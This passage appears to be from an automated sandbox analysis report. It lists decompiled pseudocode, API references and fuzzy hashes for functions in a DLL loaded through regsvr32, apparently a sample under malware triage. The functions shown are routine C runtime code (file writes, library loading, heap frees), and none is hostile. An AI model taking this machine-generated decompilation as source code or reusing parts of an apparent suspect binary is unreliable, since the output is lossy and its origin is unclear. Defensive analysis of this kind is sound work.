    						_v40 = 1;
    						_t186 =  *((intOrPtr*)(0x6f85d638 + _v80 * 4));
    						_v48 = _t186;
    						if(_t245 != 0xfde9) {
    							goto L19;
    						}
    						_t211 = _t241;
    						_t267 = _v48 + 0x2e + _t248;
    						_v116 = _t267;
    						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
    							_t211 =  &(_t211->Internal);
    							if(_t211 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t264 = _v96 - _t269;
    						_v40 = _t211;
    						if(_t211 <= 0) {
    							_t72 = ( *_t269 & 0x000000ff) + 0x6f85c760; // 0x0
    							_t253 =  *_t72 + 1;
    							_v48 = _t253;
    							__eflags = _t253 - _t264;
    							if(_t253 > _t264) {
    								__eflags = _t264;
    								if(_t264 <= 0) {
    									goto L40;
    								} else {
    									_t278 = _v44;
    									do {
    										 *((char*)( *((intOrPtr*)(0x6f85d638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
    										_t241 =  &(_t241->Internal);
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									goto L39;
    								}
    							} else {
    								_v144 = _t241;
    								__eflags = _t253 - 4;
    								_v140 = _t241;
    								_v56 = _t269;
    								_v40 = (_t253 == 4) + 1;
    								_t220 = E6F85169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
    								_t287 = _t286 + 0x10;
    								__eflags = _t220 - 0xffffffff;
    								if(_t220 == 0xffffffff) {
    									goto L48;
    								} else {
    									_t279 = _v48;
    									goto L18;
    								}
    							}
    						} else {
    							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6f85c760)) + 1;
    							_v56 = _t224;
    							_t225 = _t224 - _v40;
    							_v48 = _t225;
    							if(_t225 > _t264) {
    								__eflags = _t264;
    								if(_t264 > 0) {
    									_t280 = _t248;
    									do {
    										_t227 =  *((intOrPtr*)(_t241 + _t269));
    										_t259 =  *((intOrPtr*)(0x6f85d638 + _v80 * 4)) + _t280 + _t241;
    										_t241 =  &(_t241->Internal);
    										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
    										_t280 = _v44;
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									L39:
    									_t273 = _v88;
    								}
    								L40:
    								_t277 = _t273 + _t264;
    								__eflags = _t277;
    								L41:
    								__eflags = _v60;
    								_v88 = _t277;
    							} else {
    								_t264 = _v40;
    								_t282 = _t241;
    								_t260 = _v116;
    								do {
    									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
    									_t282 =  &(_t282->Internal);
    								} while (_t282 < _t264);
    								_t283 = _v48;
    								_t261 = _v44;
    								if(_v48 > 0) {
    									E6F849DB0( &_v16 + _t264, _t269, _t283);
    									_t261 = _v44;
    									_t286 = _t286 + 0xc;
    									_t264 = _v40;
    								}
    								_t272 = _v80;
    								_t284 = _t241;
    								do {
    									 *( *((intOrPtr*)(0x6f85d638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
    									_t284 =  &(_t284->Internal);
    								} while (_t284 < _t264);
    								_t269 = _v104;
    								_t279 = _v48;
    								_v120 =  &_v16;
    								_v136 = _t241;
    								_v132 = _t241;
    								_v40 = (_v56 == 4) + 1;
    								_t237 = E6F85169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
    								_t287 = _t286 + 0x10;
    								if(_t237 == 0xffffffff) {
    									goto L48;
    								} else {
    									L18:
    									_t269 = _t269 - 1 + _t279;
    									L27:
    									_t269 =  &(_t269[1]);
    									_v104 = _t269;
    									_t193 = E6F84FCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
    									_t286 = _t287 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L48;
    									} else {
    										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
    											L47:
    											_v92 = GetLastError();
    											goto L48;
    										} else {
    											_t273 = _v84 - _v108 + _t269;
    											_v88 = _t273;
    											if(_v100 < _v56) {
    												goto L48;
    											} else {
    												if(_v51 != 0xa) {
    													L34:
    													if(_t269 >= _v96) {
    														goto L48;
    													} else {
    														_t245 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v52 = _t198;
    													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
    														goto L47;
    													} else {
    														if(_v100 < 1) {
    															goto L48;
    														} else {
    															_v84 = _v84 + 1;
    															_t273 = _t273 + 1;
    															_v88 = _t273;
    															goto L34;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L49;
    						L19:
    						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
    						__eflags = _t264 & 0x00000004;
    						if((_t264 & 0x00000004) == 0) {
    							_v33 =  *_t269;
    							_t188 = E6F8502C6(_t264);
    							_t249 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
    							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
    								_push(1);
    								_push(_t269);
    								goto L26;
    							} else {
    								_t100 =  &(_t269[1]); // 0x1
    								_t202 = _t100;
    								_v56 = _t202;
    								__eflags = _t202 - _v96;
    								if(_t202 >= _v96) {
    									_t264 = _v80;
    									_t251 = _v44;
    									_t241 = _v33;
    									 *((char*)(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2e)) = _v33;
    									 *(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2d) | 0x00000004;
    									_t277 = _t273 + 1;
    									goto L41;
    								} else {
    									_t206 = E6F84E7D9( &_v76, _t269, 2);
    									_t287 = _t286 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L48;
    									} else {
    										_t269 = _v56;
    										goto L27;
    									}
    								}
    							}
    						} else {
    							_t264 = _t264 & 0x000000fb;
    							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
    							_v23 =  *_t269;
    							_push(2);
    							 *(_t248 + _v48 + 0x2d) = _t264;
    							_push( &_v24);
    							L26:
    							_push( &_v76);
    							_t190 = E6F84E7D9();
    							_t287 = _t286 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L48;
    							} else {
    								goto L27;
    							}
    						}
    						goto L49;
    					}
    				}
    				L49:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t165 = _t183 + 0x350;
    					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t165;
    				}
    				__eflags = _v8 ^ _t285;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E6F849ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
    			}


    APIs
    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6F850969
    • __fassign.LIBCMT ref: 6F850B4E
    • __fassign.LIBCMT ref: 6F850B6B
    • WriteFile.KERNEL32(?,6F84E286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F850BB3
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F850BF3
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F850C9B
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
    • String ID:
    • API String ID: 1735259414-0
    • Opcode ID: accfa1359c8374e6a64b4ef4dc2498e4354c599e143fd0e9460c82f0d83128ad
    • Instruction ID: 5968796ddf4a59da3e85449c7781f3835bff1f8da3e8b404c5e6010bd198ce33
    • Opcode Fuzzy Hash: accfa1359c8374e6a64b4ef4dc2498e4354c599e143fd0e9460c82f0d83128ad
    • Instruction Fuzzy Hash: 9CC1E0B5D042999FCF04CFE8C9809EDBBB5AF49318F2845AAE855BB241D330AD16CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6F84AD94(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x6f85c030 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E6F84BF60(_t13, __eflags,  *0x6f85c030);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E6F84BF9B(_t14, __eflags,  *0x6f85c030, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E6F84D58B();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E6F84BF9B(_t18, __eflags,  *0x6f85c030, 0);
    								} else {
    									_t8 = E6F84BF9B(_t18, __eflags,  *0x6f85c030, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E6F84C2B0(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}


    APIs
    • GetLastError.KERNEL32(00000001,?,6F84A952,6F848F01,6F8492CE,?,6F849506,?,00000001,?,?,00000001,?,6F85A618,0000000C,6F8495FF), ref: 6F84ADA2
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F84ADB0
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F84ADC9
    • SetLastError.KERNEL32(00000000,6F849506,?,00000001,?,?,00000001,?,6F85A618,0000000C,6F8495FF,?,00000001,?), ref: 6F84AE1B
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 79f60788ba3a6125a8b9912c10f292232a02acc0249d914617a68b882568e604
    • Instruction ID: 14c8c491e2f57ee41490c4cf600aae4c2d728e837971ed3d47fd6f4b447f768f
    • Opcode Fuzzy Hash: 79f60788ba3a6125a8b9912c10f292232a02acc0249d914617a68b882568e604
    • Instruction Fuzzy Hash: 8E01D83211DB296FAF441E795C8465B2B64EF03E7D72007FAF5244D0D2EF155835D980
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84F217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t17;
    				intOrPtr _t36;
    				intOrPtr* _t38;
    				intOrPtr _t39;
    
    				_t38 = _a4;
    				if(_t38 != 0) {
    					__eflags =  *_t38;
    					if( *_t38 != 0) {
    						_t14 = E6F84FCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t14;
    						if(__eflags != 0) {
    							_t36 = _a8;
    							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
    							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
    								L10:
    								_t15 = E6F84FCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
    								__eflags = _t15;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
    									_t17 = 0;
    									__eflags = 0;
    								} else {
    									E6F84D437(GetLastError());
    									_t17 =  *((intOrPtr*)(E6F84D46D(__eflags)));
    								}
    								L13:
    								L14:
    								return _t17;
    							}
    							_t17 = E6F84F2DE(_t36, _t14);
    							__eflags = _t17;
    							if(_t17 != 0) {
    								goto L13;
    							}
    							goto L10;
    						}
    						E6F84D437(GetLastError());
    						_t17 =  *((intOrPtr*)(E6F84D46D(__eflags)));
    						goto L14;
    					}
    					_t39 = _a8;
    					__eflags =  *((intOrPtr*)(_t39 + 0xc));
    					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
    						L5:
    						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
    						_t17 = 0;
    						 *((intOrPtr*)(_t39 + 0x10)) = 0;
    						goto L14;
    					}
    					_t17 = E6F84F2DE(_t39, 1);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L14;
    					}
    					goto L5;
    				}
    				E6F84F305(_a8);
    				return 0;
    			}


    Strings
    • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F84F21C
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\regsvr32.exe
    • API String ID: 0-3922119987
    • Opcode ID: 193593485d6370584b2ae5619789833b91b11954ead292f57f5f744488d23ec6
    • Instruction ID: 1a4cd724f3bee64608d27d6c87b9b6dd00ba35f1bfb753200d312e1ea3db317c
    • Opcode Fuzzy Hash: 193593485d6370584b2ae5619789833b91b11954ead292f57f5f744488d23ec6
    • Instruction Fuzzy Hash: 0D218E7660472DBFA7049FB99C8095BB7ADEF653687008E99F8259F180E760FC5087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84BE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0x6f85d3ec + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0x6f855e38 + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E6F84D618(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}


    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,6F84BEC8,00000000,?,00000001,00000000,?,6F84BF3F,00000001,FlsFree,6F855EF4,FlsFree,00000000), ref: 6F84BE97
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: ecc4a51b27db681c7b65f13054fa22e548965fde4218b2053201273dc503b32c
    • Instruction ID: 7c32fd895c7fa90d7d1372a9862645b35a821d26e11864d70ab227bfdcfa53a6
    • Opcode Fuzzy Hash: ecc4a51b27db681c7b65f13054fa22e548965fde4218b2053201273dc503b32c
    • Instruction Fuzzy Hash: 3911C232A45B28ABDF524ABC8C40B4E37A4BF42774F110AE1FA14EF280D764F910C6D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E6F84C8EA(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0x6f8551b8(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}


    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F84C89C,?,?,6F84C864,?,00000001,?), ref: 6F84C8FF
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F84C912
    • FreeLibrary.KERNEL32(00000000,?,?,6F84C89C,?,?,6F84C864,?,00000001,?), ref: 6F84C935
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 7636f0217455becdca6a1290aa8544cc681f50189e0777da3465a9db73624f4b
    • Instruction ID: 23e36a10294801bcf4af8da7c5b66d9f9800821a30e4febb7453f19e52c62c48
    • Opcode Fuzzy Hash: 7636f0217455becdca6a1290aa8544cc681f50189e0777da3465a9db73624f4b
    • Instruction Fuzzy Hash: B2F08C30501618FBDF81AB65C809BDEBFA8EB06769F0004E1F801E9150CB348A24DA90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F85190B(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x6f85c708; // 0x6f85c758
    					if(_t23 != 0) {
    						E6F84DC0E(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f85c70c; // 0x6f85d9f4
    					if(_t24 != 0) {
    						E6F84DC0E(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f85c710; // 0x6f85d9f4
    					if(_t25 != 0) {
    						E6F84DC0E(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f85c738; // 0x6f85c75c
    					if(_t26 != 0) {
    						E6F84DC0E(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x6f85c73c; // 0x6f85d9f8
    					if(_t27 != 0) {
    						return E6F84DC0E(_t6);
    					}
    				}
    				return _t6;
    			}


    APIs
    • _free.LIBCMT ref: 6F851923
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    • _free.LIBCMT ref: 6F851935
    • _free.LIBCMT ref: 6F851947
    • _free.LIBCMT ref: 6F851959
    • _free.LIBCMT ref: 6F85196B
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 1cc14411765cfb5c7fe440c6973fe44698c3cba6b5b1deeb9f6b82555fdfc5b7
    • Instruction ID: 912e0a2f2aa3c25840c1a089e457704da1883ea2557ab7a140e8116a0fcb685c
    • Opcode Fuzzy Hash: 1cc14411765cfb5c7fe440c6973fe44698c3cba6b5b1deeb9f6b82555fdfc5b7
    • Instruction Fuzzy Hash: 4FF04F32504B08A78B84CEACD2C4C5673DEEA027247A00C86E015DFA40C774F8A18A90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6F84EB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				signed int _v6;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v72;
    				intOrPtr* _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				signed int _v124;
    				struct _WIN32_FIND_DATAW _v608;
    				char _v609;
    				intOrPtr* _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				union _FINDEX_INFO_LEVELS _v628;
    				signed int _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				union _FINDEX_INFO_LEVELS _v640;
    				signed int _v644;
    				signed int _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				union _FINDEX_INFO_LEVELS _v664;
    				signed int _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				union _FINDEX_INFO_LEVELS _v676;
    				intOrPtr _v724;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* _t131;
    				signed int _t132;
    				signed int _t134;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr* _t150;
    				signed int _t152;
    				intOrPtr _t153;
    				signed int _t157;
    				signed int _t159;
    				signed int _t164;
    				signed int _t166;
    				char _t168;
    				signed char _t169;
    				signed int _t175;
    				union _FINDEX_INFO_LEVELS _t179;
    				signed int _t185;
    				union _FINDEX_INFO_LEVELS _t188;
    				intOrPtr* _t196;
    				signed int _t199;
    				intOrPtr _t204;
    				signed int _t206;
    				signed int _t209;
    				signed int _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t215;
    				signed int _t217;
    				signed int _t218;
    				signed int* _t219;
    				signed int _t222;
    				void* _t225;
    				union _FINDEX_INFO_LEVELS _t226;
    				void* _t227;
    				intOrPtr _t229;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t236;
    				intOrPtr* _t239;
    				signed int _t241;
    				intOrPtr* _t244;
    				signed int _t249;
    				signed int _t255;
    				signed int _t257;
    				signed int _t263;
    				intOrPtr* _t264;
    				signed int _t272;
    				signed int _t274;
    				intOrPtr* _t275;
    				void* _t277;
    				signed int _t280;
    				signed int _t283;
    				signed int _t285;
    				intOrPtr _t287;
    				void* _t288;
    				signed int* _t292;
    				signed int _t293;
    				signed int _t295;
    				signed int _t296;
    				signed int _t297;
    				signed int _t299;
    				void* _t300;
    				void* _t301;
    				signed int _t302;
    				void* _t306;
    				signed int _t307;
    				void* _t308;
    				void* _t309;
    				void* _t310;
    				signed int _t311;
    				void* _t312;
    				void* _t313;
    
    				_t131 = _a8;
    				_t309 = _t308 - 0x28;
    				_push(__esi);
    				_t317 = _t131;
    				if(_t131 != 0) {
    					_t292 = _a4;
    					_t222 = 0;
    					 *_t131 = 0;
    					_t283 = 0;
    					_t132 =  *_t292;
    					_t232 = 0;
    					_v608.cAlternateFileName = 0;
    					_v40 = 0;
    					_v36 = 0;
    					__eflags = _t132;
    					if(_t132 == 0) {
    						L9:
    						_v8 = _t222;
    						_t134 = _t232 - _t283;
    						_t293 = _t283;
    						_v12 = _t293;
    						_t271 = (_t134 >> 2) + 1;
    						_t136 = _t134 + 3 >> 2;
    						__eflags = _t232 - _t293;
    						_v16 = (_t134 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
    						__eflags = _t295;
    						if(_t295 != 0) {
    							_t213 = _t283;
    							_t280 = _t222;
    							do {
    								_t264 =  *_t213;
    								_t20 = _t264 + 1; // 0x1
    								_v20 = _t20;
    								do {
    									_t215 =  *_t264;
    									_t264 = _t264 + 1;
    									__eflags = _t215;
    								} while (_t215 != 0);
    								_t222 = _t222 + 1 + _t264 - _v20;
    								_t213 = _v12 + 4;
    								_t280 = _t280 + 1;
    								_v12 = _t213;
    								__eflags = _t280 - _t295;
    							} while (_t280 != _t295);
    							_t271 = _v16;
    							_v8 = _t222;
    							_t222 = 0;
    							__eflags = 0;
    						}
    						_t296 = E6F84CC22(_t136, _t271, _v8, 1);
    						_t310 = _t309 + 0xc;
    						__eflags = _t296;
    						if(_t296 != 0) {
    							_v12 = _t283;
    							_t139 = _t296 + _v16 * 4;
    							_t233 = _t139;
    							_v28 = _t139;
    							_t140 = _t283;
    							_v16 = _t233;
    							__eflags = _t140 - _v40;
    							if(_t140 == _v40) {
    								L24:
    								_v12 = _t222;
    								 *_a8 = _t296;
    								_t297 = _t222;
    								goto L25;
    							} else {
    								_t274 = _t296 - _t283;
    								__eflags = _t274;
    								_v32 = _t274;
    								do {
    									_t150 =  *_t140;
    									_t275 = _t150;
    									_v24 = _t150;
    									_v20 = _t275 + 1;
    									do {
    										_t152 =  *_t275;
    										_t275 = _t275 + 1;
    										__eflags = _t152;
    									} while (_t152 != 0);
    									_t153 = _t275 - _v20 + 1;
    									_push(_t153);
    									_v20 = _t153;
    									_t157 = E6F852161(_t233, _v28 - _t233 + _v8, _v24);
    									_t310 = _t310 + 0x10;
    									__eflags = _t157;
    									if(_t157 != 0) {
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										E6F84C27C();
    										asm("int3");
    										_t306 = _t310;
    										_push(_t233);
    										_t239 = _v72;
    										_t65 = _t239 + 1; // 0x1
    										_t277 = _t65;
    										do {
    											_t159 =  *_t239;
    											_t239 = _t239 + 1;
    											__eflags = _t159;
    										} while (_t159 != 0);
    										_push(_t283);
    										_t285 = _a8;
    										_t241 = _t239 - _t277 + 1;
    										_v12 = _t241;
    										__eflags = _t241 -  !_t285;
    										if(_t241 <=  !_t285) {
    											_push(_t222);
    											_push(_t296);
    											_t68 = _t285 + 1; // 0x1
    											_t225 = _t68 + _t241;
    											_t300 = E6F84DC48(_t225, 1);
    											__eflags = _t285;
    											if(_t285 == 0) {
    												L40:
    												_push(_v12);
    												_t225 = _t225 - _t285;
    												_t164 = E6F852161(_t300 + _t285, _t225, _v0);
    												_t311 = _t310 + 0x10;
    												__eflags = _t164;
    												if(_t164 != 0) {
    													goto L45;
    												} else {
    													_t229 = _a12;
    													_t206 = E6F84F185(_t229);
    													_v12 = _t206;
